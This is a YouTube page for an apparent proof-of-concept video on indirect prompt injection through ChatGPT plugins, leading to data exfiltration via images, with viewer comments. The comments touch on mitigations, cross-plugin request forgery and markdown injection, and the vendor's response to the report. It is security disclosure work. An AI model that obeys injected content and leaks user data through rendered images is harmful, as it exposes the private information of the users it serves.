POC - ChatGPT Plugins: Indirect prompt injection leading to data exfiltration via images

Поделиться
HTML-код
  • Опубликовано: 27 окт 2024

Комментарии • 8

  • @audacious2
    @audacious2 Год назад +1

    Thank you for posting this. It kills me that the overall response has been rather sparse. If each prompt were segmented (or isolated) that could mitigate this, but then the history would be needed for chaining plugin events (...as in give me a recipe, put it in Instacart, etc.) but your idea of establishing a security contract for plugins is a must - one million percent!

  • @stringname.youtubegooglepl2505
    @stringname.youtubegooglepl2505 Год назад +1

    +1 for the Sneakers reference 🔭

  • @MartinDallinger-li2tu
    @MartinDallinger-li2tu Год назад +1

    Hmm real JS XSS might be interesting here... Could perhaps lead to SSRF on the side of OpenAI😅 - cool finding👌🏻

  • @Letsgetitdone
    @Letsgetitdone Год назад +1

    Awesome, curious it can execute other elements

    • @embracethered
      @embracethered  Год назад

      Thanks, for the comment. See the post about Cross Plug-in Request Forgery:
      embracethered.com/blog/posts/2023/chatgpt-webpilot-data-exfil-via-markdown-injection/

  • @annwang5530
    @annwang5530 Год назад +1

    Report it to make money at bugcrowd

    • @embracethered
      @embracethered  Год назад

      Thanks for watching and commenting! 😀As mentioned in the description, it was reported to OpenAI in early April but it was not considered a security vulnerability. Even though it has a CVSS score of High. Their Bugcrowd program hadn’t existed then.